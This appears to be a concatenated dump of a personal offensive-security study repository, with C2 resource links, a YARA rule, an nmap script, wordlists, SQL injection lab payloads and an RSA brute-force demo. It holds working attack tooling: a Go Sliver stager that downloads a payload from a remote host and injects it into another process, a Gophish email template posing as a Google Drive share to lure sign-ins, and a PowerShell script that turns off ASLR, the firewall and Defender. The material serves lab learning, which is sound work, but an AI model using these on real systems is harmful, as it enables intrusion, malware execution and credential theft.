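-------------------------------------------------------------------------------- /LearningResources/README.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Learning Resources 2 | 3 | ### Presentations 4 | - [Break The Isolation: Cross-Account AWS Vulnerabilities](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Breaking-The-Isolation-Cross-Account-AWS-Vulnerabilities.pdf) 5 | - [HTTP/2: The Sequel is Always Worse](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Kettle-HTTP-The-Sequel-Is-Always-Worse.pdf) 6 | 7 | ### Blogs 8 | - [GadgetToJScript, Covenant, Donut](https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html) 9 | - [Attacking Active Directory](https://zer1t0.gitlab.io/posts/attacking_ad/) 10 | - [F-Secure: Hunting for AMSI Bypasses](https://blog.f-secure.com/hunting-for-amsi-bypasses/) 11 | 12 | ### Tools/Repos 13 | - [Caddy Server](https://caddyserver.com/docs/) 14 | - [Sliver C2](https://github.com/BishopFox/sliver) 15 | - [Covenant C2](https://github.com/cobbr/Covenant) 16 | - [Merlin C2 Server](https://github.com/Ne0nd0g/merlin) / [Merlin C2 Agent](https://github.com/Ne0nd0g/merlin-agent) 17 | - [Pwn 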
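Jenkins](https://github.com/gquere/pwn_jenkins) 18 | - [Cobalt Strike: Malleable C2 Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles) 19 | - [Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) 20 | -------------------------------------------------------------------------------- /Misc/YARA/ExtractFileIPs.yar: --------------------------------------------------------------------------------
rule ExtractFileIPs
{
    meta:
        description = "This Yara rule extracts IP addresses located within a file"
        author = "Alexis Rodriguez"
        date = "2020-10-12"

    strings:
        // Dotted-quad candidate. \b on both ends stops the pattern from
        // firing on a four-octet-looking slice of a longer run of digits
        // and dots (version strings such as 10.0.19041.1234, timestamps);
        // the original had no boundaries and matched "1.2.3.4" inside
        // "1.2.3.4567". Octets are still not range-checked
        // (999.999.999.999 matches), so validate hits downstream --
        // `yara -s` prints the matched strings.
        // "wide" additionally matches UTF-16LE text (two bytes per
        // character); "ascii" is the default and is spelled out so the
        // rule visibly searches both encodings.
        $ip = /\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b/ wide ascii

    condition:
        $ip and filesize < 10MB
}
-------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "net" 7 | "time" 8 | 9 | arg "github.com/alexflint/go-arg" 10 | ) 11 | 12 | var args struct { 13 | ListInjectableProcesses bool `arg:"-l,--list-injectable-processes" help:"list injectable processes"` 14 | ProcessPID int `arg:"-p,--pid" help:"the process ID to inject payload into" default:"0"` 15 | SliverHost string `arg:"-s,--sliver-host" help:"the sliver IP:PORT hosting the stager to execute"` 16 | } 17 | 18 | func main() { 19 | arg.MustParse(&args) 20 | 21 | if args.ListInjectableProcesses { 22 | findInjectableProcesses() 23 | return 24 | } 25 | 26 | if args.ProcessPID != 0 { 27 | if args.SliverHost == "" { 28 | fmt.Println("must specify sliver IP:PORT hosting 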
stager, `--sliver-host`") 29 | return 30 | } else { 31 | dialer := net.Dialer{ 32 | Timeout: time.Second * 3, 33 | } 34 | conn, err := dialer.Dial("tcp", args.SliverHost) 35 | if err != nil { 36 | fmt.Println(err.Error()) 37 | return 38 | } 39 | defer conn.Close() 40 | payload, _ := ioutil.ReadAll(conn) 41 | ntCreateRemoteThread(args.ProcessPID, payload) 42 | } 43 | } else { 44 | fmt.Println("must specify a valid PID with `--pid`") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/Wordlists/usernames.txt: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | test 4 | guest 5 | info 6 | adm 7 | mysql 8 | user 9 | administrator 10 | oracle 11 | ftp 12 | pi 13 | puppet 14 | ansible 15 | ec2-user 16 | vagrant 17 | azureuser 18 | academico 19 | acceso 20 | access 21 | accounting 22 | accounts 23 | acid 24 | activestat 25 | ad 26 | adam 27 | adkit 28 | admin 29 | administracion 30 | administrador 31 | administrator 32 | administrators 33 | admins 34 | ads 35 | adserver 36 | adsl 37 | ae 38 | af 39 | affiliate 40 | affiliates 41 | afiliados 42 | ag 43 | agenda 44 | agent 45 | ai 46 | aix 47 | ajax 48 | ak 49 | akamai 50 | al 51 | alabama 52 | alaska 53 | albuquerque 54 | alerts 55 | alpha 56 | alterwind 57 | am 58 | amarillo 59 | americas 60 | an 61 | anaheim 62 | analyzer 63 | announce 64 | announcements 65 | antivirus 66 | ao 67 | ap 68 | apache 69 | apollo 70 | app 71 | app01 72 | app1 73 | apple 74 | application 75 | applications 76 | apps 77 | appserver 78 | aq 79 | ar 80 | archie 81 | arcsight 82 | argentina 83 | arizona 84 | arkansas 85 | arlington 86 | as 87 | as400 88 | asia 89 | asterix 90 | at 91 | athena 92 | atlanta 93 | atlas 94 | att 95 | au 96 | auction 97 | austin 98 | auth 99 | auto 100 | autodiscover 101 | -------------------------------------------------------------------------------- /NSE/http-server-header-enum.nse: 
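--------------------------------------------------------------------------------
---
-- Requests "/" on HTTP(S) ports of private-address hosts and reports the
-- Server response header.
--
-- @usage
-- nmap -p 80,443 --script http-server-header-enum <target>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- |_http-server-header-enum: Server Header ==> nginx
--
-- @args
-- none
---

local shortport = require "shortport"
local ipOps = require "ipOps"
local http = require "http"
local stdnse = require "stdnse"

description = [[
An example NSE script that makes an HTTP GET request to any HTTP(S)
port it finds on a private-address host and reports the value of the
Server response header
]]

author = {"Alexis Rodriguez"}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {
  "safe"
}

-- shortport.port_or_service returns a rule *function* that has to be called
-- with (host, port). The original wrapped it as
-- `function portrule() return shortport.port_or_service(...) end`, which
-- handed NSE the function itself -- a truthy value -- so the script ran
-- against every port, not just 80/443.
local is_http_port = shortport.port_or_service({80, 443}, {"http", "https"}, "tcp", "open")

-- The original also defined a separate hostrule. When a hostrule matches,
-- NSE calls the action with only (host), and the shared action dereferenced
-- port.number, so the host-level invocation err'd out. It also passed the
-- host table to ipOps.isPrivate, which expects an IP string. Both checks now
-- live in a single portrule.
portrule = function(host, port)
  -- ipOps.isPrivate: true for non-routable ranges (RFC 1918, loopback, link-local, ...)
  return ipOps.isPrivate(host.ip) and is_http_port(host, port)
end

action = function(host, port)
  stdnse.debug(1, "IP::%s", host.ip)
  stdnse.debug(1, "PORT::%s", port.number)

  local opts = {}
  local resp = http.get(host, port, "/", opts)
  if not resp or not resp.status then
    -- connection/protocol failure: report nothing rather than a bogus header
    return nil
  end

  -- The http library lower-cases header names. "nil" keeps the previous
  -- output for a missing header instead of relying on string.format's
  -- handling of a nil argument.
  local server = resp.header["server"] or "nil"
  return stdnse.format_output(
    true, string.format("Server Header ==> %s", server)
  )
end
-------------------------------------------------------------------------------- /Phishing/Gophish/email_templates/google-drive.tmpl.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |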

Hello {{.FirstName}},


Please refer to the vital info I've shared with you using Google Drive. 


Click https://google.com/drive/docs/file012345 and sign in to view details..


 


Regards.


 


CONFIDENTIALITY NOTICE:  This e-mail and any transmitted files are private and confidential and are solely for the use of the recipient(s) to whom it is addressed.  Any unauthorized review, use, disclosure, distribution or copying of this communication is strictly forbidden.  If you have received this communication in error, please delete and immediately notify the sender via the e-mail return address.  Thank you for your compliance.


Please consider the environment before printing this e-mail.


 


{{.Tracker}}

25 | 26 | 27 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/auth_with_negroni.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "net/http" 7 | 8 | "github.com/gorilla/mux" 9 | "github.com/urfave/negroni" 10 | ) 11 | 12 | type BadAuth struct { 13 | Username string 14 | Password string 15 | } 16 | 17 | func (b *BadAuth) ServeHTTP(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) { 18 | username := r.URL.Query().Get("username") 19 | password := r.URL.Query().Get("password") 20 | if username == "" || password == "" { 21 | http.Error(w, "Not Authorized", 401) 22 | return 23 | } 24 | 25 | // Adding the ``username`` value to context of r 26 | ctx := context.WithValue(r.Context(), "username", username) 27 | // Setting the new context to the one created in the line above 28 | r = r.WithContext(ctx) 29 | // Invoking the next middleware in the chain 30 | next(w, r) 31 | } 32 | 33 | func login(w http.ResponseWriter, r *http.Request) { 34 | username := r.Context().Value("username").(string) 35 | fmt.Fprintf(w, "Welcome, %s\n!", username) 36 | } 37 | 38 | func main() { 39 | r := mux.NewRouter() 40 | r.HandleFunc("/login", login).Methods("GET") 41 | n := negroni.Classic() 42 | n.Use(&BadAuth{ 43 | Username: "admin", 44 | Password: "totally secure password123", 45 | }) 46 | n.UseHandler(r) 47 | http.ListenAndServe("127.0.0.1:8080", n) 48 | } 49 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/Wordlists/passwords.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | qwerty 5 | 123456789 6 | 12345 7 | 1234 8 | 111111 9 | 1234567 10 | dragon 11 | 123123 12 | baseball 13 | abc123 14 | football 15 | monkey 16 | letmein 17 | shadow 18 | master 19 | 666666 20 | qwertyuiop 21 | 123321 22 | 
mustang 23 | 1234567890 24 | michael 25 | 654321 26 | superman 27 | 1qaz2wsx 28 | 7777777 29 | 121212 30 | 000000 31 | qazwsx 32 | 123qwe 33 | killer 34 | trustno1 35 | jordan 36 | jennifer 37 | zxcvbnm 38 | asdfgh 39 | hunter 40 | buster 41 | soccer 42 | harley 43 | batman 44 | andrew 45 | tigger 46 | sunshine 47 | iloveyou 48 | 2000 49 | charlie 50 | robert 51 | thomas 52 | hockey 53 | ranger 54 | daniel 55 | starwars 56 | klaster 57 | 112233 58 | george 59 | computer 60 | michelle 61 | jessica 62 | pepper 63 | 1111 64 | zxcvbn 65 | 555555 66 | 11111111 67 | 131313 68 | freedom 69 | 777777 70 | pass 71 | maggie 72 | 159753 73 | aaaaaa 74 | ginger 75 | princess 76 | joshua 77 | cheese 78 | amanda 79 | summer 80 | love 81 | ashley 82 | nicole 83 | chelsea 84 | biteme 85 | matthew 86 | access 87 | yankees 88 | 987654321 89 | dallas 90 | austin 91 | thunder 92 | taylor 93 | matrix 94 | mobilemail 95 | mom 96 | monitor 97 | monitoring 98 | montana 99 | moon 100 | moscow 101 | -------------------------------------------------------------------------------- /Phishing/Gophish/README.md: -------------------------------------------------------------------------------- 1 | # Gophish Phishing Infrastructure Automation (AWS) 2 | 3 | ### Prequisites 4 | 1. AWS credential profile (`~/.aws/credentials`) 5 | 2. A Domain - We'll be using Amazon Route 53 to register a domain if you don't already have one. 6 | 3. An SMTP server - We'll be using AWS SES (Simple Email Server). 7 | 4. 
Download and install [Terraform](https://www.terraform.io/downloads.html) 8 | 9 | ### Run 10 | 11 | > Don't forget to change the AWS profile name in the `main.tf` file to your own profile name. 12 | 13 | ```bash 14 | terraform init 15 | terraform validate 16 | terraform plan 17 | terraform apply --auto-approve 18 | ``` 19 | 20 | ### Obtaining the Admin Creds for Gophish Login 21 | ```bash 22 | ssh -i id_rsa ec2-user@[EC2_INSTANCE_IP] 23 | sudo cat /var/log/cloud-init-output.log | grep -oE '(Please.*)password\s[a-f0-9]+' | awk '{print $(NF-1),"=",$NF}' 24 | ``` 25 | 26 | > Log in to the Gophish interface at https://[EC2_INSTANCE_IP]:3333 27 | 28 | > Enter the credentials admin:[PASSWORD] — this initial password is recorded in the instance's cloud-init log, so change it after your first login. 29 | 30 | ### Creating Target Groups 31 | 32 | ### Creating Email Templates 33 | 34 | ### Creating Landing Pages 35 | 36 | ### Creating Sending Profiles 37 | 38 | #### Sending Test Email 39 | 40 | Before saving the profile, send a test email to your own test account to confirm that emails can be sent successfully. 
41 | 42 | ### Creating Campaign 43 | -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/brute_force_rsa.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | from time import perf_counter 3 | from gmpy2 import powmod 4 | from itertools import product 5 | from string import ascii_letters 6 | 7 | def bytes_to_int(b): 8 | return int.from_bytes(b, byteorder="big") 9 | 10 | def rsa_encrypt(m, public_key): 11 | nums = public_key.public_numbers() 12 | return powmod(m, nums.e, nums.n) 13 | 14 | def brute_force(target, public_key, word_len): 15 | start = perf_counter() 16 | for word in product(ascii_letters, repeat=word_len): 17 | word = ''.join(word) 18 | word_as_int = bytes_to_int(bytes(word, "utf-8")) 19 | encrypted_word = rsa_encrypt(word_as_int, public_key) 20 | if encrypted_word == target: 21 | end = perf_counter() 22 | time_elapsed = end - start 23 | print(f"Found match: \"{word}\"") 24 | print(f"Time elapsed: {time_elapsed}") 25 | break 26 | 27 | if __name__ == "__main__": 28 | public_key = RSA ( 29 | public_exponent=65537, key_size=2048 30 | ).public_key 31 | 32 | word = b"pawn" 33 | word_as_int = bytes_to_int(word) 34 | encrypted_word = rsa_encrypt(word_as_int, public_key) 35 | brute_force(encrypted_word, public_key, len(word)) 36 | 37 | """ 38 | Found match: "pawn" 39 | Time elapsed: 58.58826439999757 40 | """ 41 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/CSharpAES.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\rodri\.nuget\packages\ 9 | PackageReference 10 | 5.7.0 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | 
-------------------------------------------------------------------------------- /Misc/WindowsRegistry/change_wallpaper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from sys import argv 4 | from ctypes import ( 5 | windll, 6 | byref, 7 | c_long 8 | ) 9 | from winreg import ( 10 | HKEY_CURRENT_USER, 11 | ConnectRegistry, 12 | OpenKey, 13 | KEY_ALL_ACCESS, 14 | EnumValue, 15 | SetValueEx, 16 | QueryInfoKey, 17 | REG_SZ 18 | ) 19 | 20 | def change_wallpaper(image: str): 21 | with ConnectRegistry(None, HKEY_CURRENT_USER) as hkcu: 22 | with \ 23 | OpenKey(hkcu, r"Control Panel\Desktop", 0, KEY_ALL_ACCESS) \ 24 | as desktop_key: 25 | print(f"[+] Changing wallpaper to {image} ...") 26 | SetValueEx(desktop_key, "WallPaper", 0, REG_SZ, image) 27 | 28 | # the following lines of code is boiler plate code 29 | # for making telling Windows that registry settings have changed 30 | # and that it needs to refresh 31 | HWND_BROADCAST = 0xFFFF 32 | WM_SETTINGCHANGE = 0x1A 33 | SMTO_ABORTIFHUNG = 0x0002 34 | result = c_long() 35 | SendMessageTimeoutW = windll.user32.SendMessageTimeoutW 36 | SendMessageTimeoutW(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u'Control Panel\\Desktop', SMTO_ABORTIFHUNG, 5000, byref(result),) 37 | 38 | if __name__ == "__main__": 39 | path_to_image: str = argv[1] 40 | change_wallpaper(path_to_image) 41 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab4/README.md: -------------------------------------------------------------------------------- 1 | # Finding a Column Containing Text 2 | 3 | ### Objective 4 | 5 | - Determine the number of columns returned in the server's response 6 | - Determine which columns contains a string data type 7 | - Return an additional row containing a string provided in a `UNION SELECT` statement 8 | 9 | ### Solution 10 | 11 | To determine the number of columns returned in the 
response, make the following request to the server while incrementing the value of the `ORDER BY` clause until 12 | an internal server error is returned: 13 | 14 | ``` 15 | https://.web-security-academy.net/filter?category=Accessories' ORDER BY 1-- - 16 | ``` 17 | 18 | Using `ORDER BY 4-- -` returns the internal server error, so we know there are 4 columns being returned. Next, we can determine which column contains text data 19 | by using the following SQL payloads: 20 | 21 | ``` 22 | ' UNION SELECT 'a',NULL,NULL-- - 23 | ' UNION SELECT NULL,'a',NULL-- - 24 | ' UNION SELECT NULL,NULL,'a'-- - 25 | ``` 26 | 27 | An error will occur when the `'a'` has been specified in a column where text data is not compatible with the returned data type. The working payload is: 28 | 29 | ``` 30 | ' UNION SELECT NULL,'a',NULL-- - 31 | ``` 32 | 33 | Use the payload above to return the string specified in the labs home page, like this: 34 | 35 | ``` 36 | ' UNION SELECT NULL,'3HRR3g',NULL-- - 37 | ``` 38 | -------------------------------------------------------------------------------- /MalwareAnalysis/MalwareAnalysisVMSetup.ps1: -------------------------------------------------------------------------------- 1 | function Disable-ASLR { 2 | 3 | <# 4 | .SYNOPSIS 5 | Disables Address Space Layout Randomization 6 | 7 | .DESCRIPTION 8 | Disable-ASLR is a function that disables Address Space Layout Randomization by setting a value 1 9 | to the registry path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages" 10 | 11 | #> 12 | New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" -Name MoveImages -Value 1 13 | } 14 | 15 | function Disable-WindowsFirewall { 16 | 17 | <# 18 | .SYNOPSIS 19 | Turns off Windows Firewall 20 | 21 | .DESCRIPTION 22 | Disable-WindowsFirewall disables the Windows firewall by using Set-NetFirewallProfile to set 23 | all the three different networks ``Enabled`` to False 24 | 25 | #> 26 | 
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled False 27 | } 28 | 29 | 30 | function Disable-WindowsDefender { 31 | 32 | <# 33 | .SYNOPSIS 34 | Turns off Windows Defender real-time monitoring 35 | 36 | .DESCRIPTION 37 | Disable-WindowsDefender disables the Windows Antivirus real-time protection monitoring by using the cmdlet 38 | Set-MpPrefence to set the property DisableRealtimeMonitoring to true 39 | 40 | #> 41 | Set-MpPreference -DisableRealtimeMonitoring $true 42 | } 43 | 44 | Disable-ASLR 45 | Disable-WindowsFirewall 46 | Disable-WindowsDefender 47 | --------------------------------------------------------------------------------